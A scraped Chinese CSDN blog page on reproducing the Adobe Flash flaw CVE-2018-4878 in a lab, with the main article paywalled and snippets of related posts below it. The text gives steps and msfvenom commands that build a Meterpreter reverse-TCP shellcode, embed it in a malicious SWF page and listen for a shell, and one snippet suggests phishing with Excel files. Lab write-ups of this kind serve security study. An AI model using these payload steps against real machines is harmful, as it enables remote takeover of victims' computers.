CVE-2018-4878 flash漏洞复现

最新推荐文章于 2024-10-01 14:45:28 发布
最新推荐文章于 2024-10-01 14:45:28 发布
阅读量1.2k 收藏 4
点赞数
文章标签: cve-2018-4878
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42214273/article/details/83267898
版权
本文详细介绍了CVE-2018-4878漏洞的复现过程,包括使用msfvenom生成shell代码,编辑CVE-2018-4878.py文件,执行Python代码生成exploit.swf和index2.html文件,通过Apache2服务部署页面,以及开启Shell会话监听来获得靶机控制权。
摘要由CSDN通过智能技术生成

先将cve-2018-4878拖入虚拟机中

使用msfvenom生成shell代码

lhost为攻击机ip地址  lport为自定义端口号

查看代码文件 

进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件

将上面msfvenom生成的代码覆盖掉原来的代码:

确认CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):

最低0.47元/天 解锁文章
Wh1te-小白
关注
CVE-2018-4878 flash 漏洞利用教程
alert['Hello World']
10-25 1570
目录漏洞描述漏洞检测漏洞利用漏洞加固参考链接 漏洞描述 漏洞检测 漏洞利用 漏洞加固 参考链接
Adobe Flash爆出严重漏洞:可导致代码任意执行 获取个人隐私
qq_41679358的博客
08-03 753
文章目录[隐藏] Adobe 被爆出的漏洞:受影响的产品版本升级修复版本其他漏洞受影响的产品版本升级修复版本 众所周知,Flash是网络攻击的首选目标。值得注意的是,Adobe在2017年7月宣布计划将Flash推入使用寿命终止状态,这意味着它将在今年年底不再更新或分发Flash Player。不过仍然在使用Adobe的用户需要警惕,因为Adobe 在今年5月被爆出了多个严重漏洞,好在Ado...
Flash漏洞CVE-2018-4878复现
玄道的网安博客
07-29 1410
简介 攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。 影响版本 FlashPlayer28.0.0.137及以前的所有版本 漏洞复现 使用msfvenom生成shell代码 生成代码,其中lhost为kali的ip地址,lport为自定义的端口号 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.111.129 lport=66.
CVE-2018-4878复现
大方子
10-07 4364
前言: CVE-2018-4878利用flash漏洞来进行攻击,如果受害者的flash版本在28.0.0.137及其之前,那么攻击者可以通过诱使受害者点击链接访问特定网页来控制受害者的电脑。 1 漏洞影响范围 Flash Player28.0.0.137及以前的所有版本 2 漏洞复现 2.1 测试环境 攻击机:kali2017 靶机:win7_x64+IE8+FLASH_playe...
CVE-2018-4878 Adobe Flash 0day 漏洞分析与利用
最新发布
Crow_RDX的博客
10-01 375
在互联网技术不断发展的今天,网络安全成为了人们关注的重点。本文将深入剖析Adobe Flash Player中存在的一项高危漏洞——CVE-2018-4878,并详细介绍其利用方法。
CVE-2018-4878 漏洞复现
qq_42039946的博客
05-14 1125
1.生成shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.130 lport=8888 -f python>shellcode.txt lhost的修改为自己kali平台的IP,端口号也可以自行修改 2.查看shellcode root@kali:~# cat shellcode.txt 3.编辑CVE-2018-4878-master.py文件 3.1 替换shellcode 3.2修改swf..
flash漏洞利用CVE-2018-4878
06-14
flash漏洞利用CVE-2018-4878。 。。。
Flash cve-2018-4878漏洞复现
weixin_43268670的博客
07-08 353
需要flash版本<=28,ie浏览器内核,有点鸡肋,但是可以打包到excel中,用的好也有奇效。 本文讲解web flash钓鱼 需要工具: flash安装包<=28版本 web服务器 kali+python利用脚本 复现: 先用kali生成一个shellcode 文本打开复制全部 下载python脚本 https://github.com/anbai-inc/CVE-2018-4878 把生成脚本里面的buf变量替换成shellcode里面的b...
cve-2018-4878漏洞复现
06-02 4642
靶机:Windows7 sp1 条件:Adobe Flash 28.0.0.137及其之前的版本     IE8浏览器及以前版本(IE9好像也行) 所需工具已上传 kali:192.168.43.16 (需要输入的命令均用&lt;&gt;标记出来,&lt;&gt;不需要输入) 准备工作: kali中打开终端,找到下载的cve-2018-4878工具,切换到该路径(这种工具在未来应该尽量...
Flash 0day漏洞CVE-2018-4878复现
weixin_44897902的博客
10-14 478
漏洞名:CVE-2018-4878 危害:造成远程命令执行 影响范围:Flash Player28.0.0.137及以前的所有版本 准备工作: kail: 192.168.91.146 win7,Flash Player28.0.0.137,IE8 这是一位前辈的Player: 链接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0 事...
Flash 0day漏洞CVE-2018-5002)千万不要乱打开Excel文档!
网站安全专家
06-09 1390
腾讯御见威胁情报中心近日监控到一例使用Adobe Flash 0day漏洞CVE-2018-5002)的APT攻击,攻击者疑通过即时聊天工具和邮箱等把恶意Excel文档发送给目标人员,诱骗目标人员打开文档。实际上,该恶意Excel文档经过特别构造,被嵌入了flash对象,用户一旦打开文档电脑就会中毒。CVE-2018-5002影响Adobe Flash Player 29.0.0.171及所有之...
flash漏洞所用shellcode的分析
06-03 1052
作 者: 轩辕小聪时 间: 2008-06-02,19:29链 接: http://bbs.pediy.com/showthread.php?t=65907作者主页: http://hi.baidu.com/yicong2007目    的: 纯属学习,请勿用于恶意用途最近几天flash漏洞的网马非常流行,于是我想分析一下shellcode是怎么跑的。但是能力所限,还难以像大牛们一样定位到有漏洞
Flash Player漏洞利用"Exploiting Flash Reliably"
weixin_34049032的博客
04-16 108
以下消息来自幻影论坛[Ph4nt0m]邮件组 前两天推荐过Mark Dowd的Paper “Exploiting Flash Reliably”[url]http://hi.baidu.com/secway/blog/item/242655971275376855fb96d8.html[/url]学习了一下,很好很强大。为以后Flash Player漏洞的利用开辟了一...
汇编如何判断溢出_CVE-2018-0802栈溢出漏洞个人分析
weixin_39941792的博客
12-06 256
本文为看雪论坛优秀文章看雪论坛作者ID:不懂就不懂概述该漏洞在微软针对CVE-2017-11882漏洞打上了kb4011604补丁后产生的,该漏洞同样是OLE 对象的“Equation Native”的数据流中的数据导致的,导致漏洞的对象是tagLOGFONT的字体名。在微软对CVE-2017-11882修补后,CVE-2018-0802的漏洞利用构造需要用到两个特别巧合的地方,最终导致了噩梦公式...
本地复现Flash 0day漏洞(CVE-2018-4878)
weixin_30627381的博客
03-17 412
影响版本: Adobe Flash Player <= 28.0.0.137 EXP下载地址: 链接: https://pan.baidu.com/s/1_VVQfdx6gsJvEDJj51JgMQ 密码: d8tm 漏洞复现: 攻击机:kail 靶机:win7 x64 浏览器:360浏览器 0x01 生成shellcode msfvenom -p windows...
漏洞复现】Adobe Flash Player安装程序的漏洞|Flash 0day(CVE-2018-15982)
VI___
01-13 522
一、CVE-2018-15982 ——任意代码执行漏洞 2018年11月29日,360高级威胁应对团队在全球范围内第一时间发现一起针对俄罗斯的APT攻击行动,通过一份俄文内容的医院员工问卷文档,携带最新的Flash 0day漏洞和具有自毁功能的专属木马程序,该漏洞CVE-2018-15982)允许攻击者恶意制作的Flash对象在受害者的计算机上执行代码,从而获取对系统命令行的访问权限。 ...
[漏洞复现] CVE-2018-4878 Flash 0day
weixin_34292287的博客
04-01 196
1、漏洞概述2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞CVE-2018-4878)。***者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。直到2018年2月5号,Adboe才发布补...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值